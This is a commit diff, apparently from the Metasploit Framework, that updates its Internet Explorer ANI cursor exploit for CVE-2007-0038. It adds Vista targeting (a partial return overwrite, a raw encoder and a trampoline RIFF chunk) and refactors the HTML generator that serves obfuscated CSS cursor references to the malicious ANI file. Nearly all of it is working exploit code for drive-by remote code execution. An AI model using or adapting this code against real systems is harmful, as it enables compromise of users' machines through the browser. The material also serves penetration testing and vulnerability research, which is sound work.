fixes for Vista, brute forcing
git-svn-id: file:///home/svn/framework3/trunk@4598 4d416f70-5f16-0410-b530-b9f4589650daunstable
Matt Miller
parent
86f4bfd514
commit
6cfab21bcb
|
|
@ -96,18 +96,20 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
|
|
||||||
#
|
#
|
||||||
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
|
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
|
||||||
# of the RIFF itself.
|
# of the RIFF chunk itself. The length field of the RIFF chunk
|
||||||
|
# tag contains a short jump into an embedded riff chunk that
|
||||||
|
# makes a long relative jump into the actual payload.
|
||||||
#
|
#
|
||||||
|
[ 'Windows Vista user32.dll 6.0.6000.16386',
|
||||||
# The RIFF magic bytes and the size of the riff file are
|
{
|
||||||
# executed which then bounce through.
|
'Ret' => 0x700b,
|
||||||
#
|
'Len' => 2,
|
||||||
# 1. Partial overwrite return with the address of a jmp dword [ebx]
|
|
||||||
# 2. Executes the first few bytes of the RIFF chunk and then
|
# On Vista, the pages that contain the RIFF are read-only.
|
||||||
# does a jmp $+0x16
|
# In-place decoders cannot be used.
|
||||||
# 3. Executes a relative jump to the start of the payload
|
'EncoderType' => Msf::Encoder::Type::Raw
|
||||||
# itself.
|
}
|
||||||
[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
|
]
|
||||||
|
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Mar 28 2007',
|
'DisclosureDate' => 'Mar 28 2007',
|
||||||
|
|
@ -144,29 +146,15 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
"</head><body>" + rand_text_alphanumeric(rand(128)+1)
|
"</head><body>" + rand_text_alphanumeric(rand(128)+1)
|
||||||
|
|
||||||
mytargs = (target.name =~ /All Targets/) ? targets : [target]
|
mytargs = (target.name =~ /All Targets/) ? targets : [target]
|
||||||
|
|
||||||
mytargs.each_index do |i|
|
if target.name =~ /All Targets/
|
||||||
|
targets.each_index { |i|
|
||||||
next if not mytargs[i].ret
|
next if not targets[i].ret
|
||||||
|
|
||||||
html << "<div style='" +
|
html << generate_div(gext, i)
|
||||||
generate_css_padding() +
|
}
|
||||||
Rex::Text.to_rand_case("cursor") +
|
else
|
||||||
generate_css_padding() +
|
html << generate_div(gext, target_index)
|
||||||
":" +
|
|
||||||
generate_css_padding() +
|
|
||||||
Rex::Text.to_rand_case("url(") +
|
|
||||||
generate_css_padding() +
|
|
||||||
'"' +
|
|
||||||
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
|
||||||
"?#{rand_text_alpha(rand(12)+1)}=#{i}" +
|
|
||||||
'"' +
|
|
||||||
generate_css_padding() +
|
|
||||||
");" +
|
|
||||||
generate_css_padding() +
|
|
||||||
"'>" +
|
|
||||||
generate_padding() +
|
|
||||||
"</div>"
|
|
||||||
end
|
end
|
||||||
|
|
||||||
html << "</body></html>"
|
html << "</body></html>"
|
||||||
|
|
@ -191,6 +179,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
handler(cli)
|
handler(cli)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def generate_div(gext, targ)
|
||||||
|
"<div style='" +
|
||||||
|
generate_css_padding() +
|
||||||
|
Rex::Text.to_rand_case("cursor") +
|
||||||
|
generate_css_padding() +
|
||||||
|
":" +
|
||||||
|
generate_css_padding() +
|
||||||
|
Rex::Text.to_rand_case("url(") +
|
||||||
|
generate_css_padding() +
|
||||||
|
'"' +
|
||||||
|
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
||||||
|
"?#{rand_text_alpha(rand(12)+1)}=#{targ}" +
|
||||||
|
'"' +
|
||||||
|
generate_css_padding() +
|
||||||
|
");" +
|
||||||
|
generate_css_padding() +
|
||||||
|
"'>" +
|
||||||
|
generate_padding() +
|
||||||
|
"</div>"
|
||||||
|
end
|
||||||
|
|
||||||
def generate_ani(payload, target)
|
def generate_ani(payload, target)
|
||||||
|
|
||||||
# Build the first ANI header
|
# Build the first ANI header
|
||||||
|
|
@ -208,10 +217,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
|
|
||||||
if (target.name =~ /Vista/)
|
if (target.name =~ /Vista/)
|
||||||
# Vista has ebp=80, eip=84
|
# Vista has ebp=80, eip=84
|
||||||
anih_b = anih_a + rand_text(84-anih_a.length)
|
anih_b = rand_text(84)
|
||||||
|
|
||||||
# Overwrite locals with invalid pointers
|
# Overwrite local counter variable and pointers
|
||||||
anih_b[68, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3
|
anih_b[68, 12] = [0].pack('V') * 3
|
||||||
else
|
else
|
||||||
# XP/2K has ebp=76 and eip=80
|
# XP/2K has ebp=76 and eip=80
|
||||||
anih_b = anih_a + rand_text(80-anih_a.length)
|
anih_b = anih_a + rand_text(80-anih_a.length)
|
||||||
|
|
@ -226,6 +235,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
# Begin the ANI chunk
|
# Begin the ANI chunk
|
||||||
riff = "ACON"
|
riff = "ACON"
|
||||||
|
|
||||||
|
# Calculate the data offset for the trampoline chunk and add
|
||||||
|
# the trampoline chunk if we're attacking Vista
|
||||||
if target.name =~ /Vista/
|
if target.name =~ /Vista/
|
||||||
trampoline_doffset = riff.length + 8
|
trampoline_doffset = riff.length + 8
|
||||||
|
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue